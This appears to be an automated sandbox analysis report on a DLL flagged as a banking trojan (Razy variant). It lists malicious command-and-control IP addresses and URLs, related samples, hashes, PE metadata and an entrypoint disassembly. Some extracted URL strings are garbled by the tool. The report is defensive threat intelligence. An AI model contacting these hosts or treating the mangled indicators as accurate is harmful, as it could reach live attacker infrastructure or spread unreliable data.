                        https://185.56.219.47:8116/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96:6891/derRloaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/lloaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://18185.56.219.47:8116/~loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://185.56.219.47:8116/vrundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/h.dllloaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456349641.0000000003414000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/graphyloaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/xloaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.Floaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/softloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.506581152.00000000033DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/0Z0W1loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/derloaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/llrundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/.140.214:808/loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/4.140.214:808/hyloaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96/Jloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/lloaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96:6891/graphyloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://452.46.210.220/rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://192.46.210.220/ographyloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.558714195.0000000001155000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://143.244.140.214:808/C~grundll32.exe, 00000004.00000003.479096259.00000000033DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/Ps%loaddll32.exe, 00000000.00000003.819035845.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.740542417.000000000339C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/Microsoftloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.77.0.96 | unknown | United States | 20473 | AS-CHOOPAUS | true
185.56.219.47 | unknown | Italy | 202675 | KELIWEBIT | true
192.46.210.220 | unknown | United States | 5501 | FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe | true
143.244.140.214 | unknown | United States | 174 | COGENT-174US | true

Private

IP
192.168.2.1

                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510692
Start date: 28.10.2021
Start time: 05:01:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Variant.Razy.980776.19803.14094 (renamed file extension from 14094 to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.bank.troj.evad.winDLL@11/1@0/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 14% (good quality ratio 14%)
• Quality average: 79.2%
• Quality standard deviation: 15.7%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210, 20.82.209.183, 23.211.4.86, 20.82.210.154, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 52.251.79.25, 40.91.112.76
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
05:03:47 | API Interceptor | 170x Sleep call for process: rundll32.exe modified
05:03:48 | API Interceptor | 170x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
45.77.0.96 | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
185.56.219.47 | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

Match | Associated Sample Name / URL | Detection | Context
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious | 185.56.219.47
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.24814.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.29553.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.15127.dllGet hashmaliciousBrowse
                                                                                                        • 45.77.0.96

                                                                                                        JA3 Fingerprints

                                                                                                        | Match | Associated Sample Name / URL | Detection | Context |
                                                                                                        | 51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.31954.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.10558.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.8232.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.30568.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.9478.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.28061.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 192.46.210.220 |
                                                                                                        | | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious | 192.46.210.220 |

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):3.4145988351536807
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kK7s8i8EMl/s8gFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:D9iW/Y2kPlE99SNxAhUefit
                                                                                                        MD5:DED1536689863466A0127B6A5906C225
                                                                                                        SHA1:F5D0B9678A1A1CD80AB52C7A677E933CC5B4326F
                                                                                                        SHA-256:E984AB0802CFAB2E713433C29CE65BE82252F61046973EFEC4DD66EF52FFB313
                                                                                                        SHA-512:D7CD383D0D720FE026E6CD543ED773CA8732E4008949C5E815CF8C08BE810E4AAE35463E71526A6EBFE45FDE71D9549FBFB7709FC5DFA9F24F56F237586A869D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: p...... ........9..&....(...............................................5....... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.4397521906978215
                                                                                                        TrID:
                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:SecuriteInfo.com.Variant.Razy.980776.19803.dll
                                                                                                        File size:1375232
                                                                                                        MD5:617b1fd1bfdab72e5562c0c2f7600bcb
                                                                                                        SHA1:9e5bf19ba51cbd5849a225f022b939a48e5769b3
                                                                                                        SHA256:9b9c38d267cedfb2c423fbad71a50f76d0743a3ecc8f6027029fa13ea36e00e4
                                                                                                        SHA512:36ca0f3dc290ee75af38b97cc66e9c8f799b2c1e952aedf90528aa179803f40450647c31bf4c14ea50c6fa35027741c8520f7200011010463b904be3553aca96
                                                                                                        SSDEEP:24576:inxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu74:icfk82uAJTI7KPswKwuS
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.g.@.4.@.4.@.43.j4.@.4.8.4.@.4.(.5.@.4.(.5.@.4.(.5.@.4.(.5.@.43.n4.@.4.@.4.A.4.(.5.@.4.(.5.@.4.(a4.@.4.(.5.@.4Rich.@.4.......

                                                                                                        File Icon

                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x4336b0
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                        Time Stamp:0x5BBD9691 [Wed Oct 10 06:05:05 2018 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:6
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:6
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:6
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                        jne 00007FE1509E9B77h
                                                                                                        call 00007FE1509EA8A7h
                                                                                                        mov eax, dword ptr [ebp+10h]
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        push ecx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        push edx
                                                                                                        call 00007FE1509E9966h
                                                                                                        add esp, 0Ch
                                                                                                        pop ebp
                                                                                                        retn 000Ch
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        push edx
                                                                                                        mov edx, dword ptr [ebp+08h]
                                                                                                        xor edx, dword ptr [0054806Ch]
                                                                                                        push edx
                                                                                                        call 00007FE1509E9BB4h
                                                                                                        add esp, 08h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        mov eax, 00000020h
                                                                                                        sub eax, edx
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+08h]
                                                                                                        push ecx
                                                                                                        call 00007FE1509E9B83h
                                                                                                        add esp, 08h
                                                                                                        xor eax, dword ptr [0054806Ch]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        ror eax, cl
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007FE1509EAF0Dh
                                                                                                        push eax
                                                                                                        call 00007FE150A2BC17h
                                                                                                        add esp, 04h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]

                                                                                                        Data Directories

                                                                                                        | Name | Virtual Address | Virtual Size | Is in Section |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x147190 | 0x6c | .rdata |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1471fc | 0x28 | .rdata |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15c000 | 0x72b4 | .reloc |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x143110 | 0x54 | .rdata |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x143168 | 0x40 | .rdata |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_IAT | 0xc7000 | 0x184 | .rdata |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                                                                                        | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                                     Entropy        Characteristics
.text   0x1000           0xc5e2f       0xc6000   False     0.442065922901   data                                          6.47812452769  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xc7000          0x80aec       0x80c00   False     0.534105734223   data                                          5.52054992664  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x148000         0x13ba0       0x1800    False     0.1875           DOS executable (block device driverpyright)   3.99635070896  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x15c000         0x72b4        0x7400    False     0.710264008621   data                                          6.69742088731  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
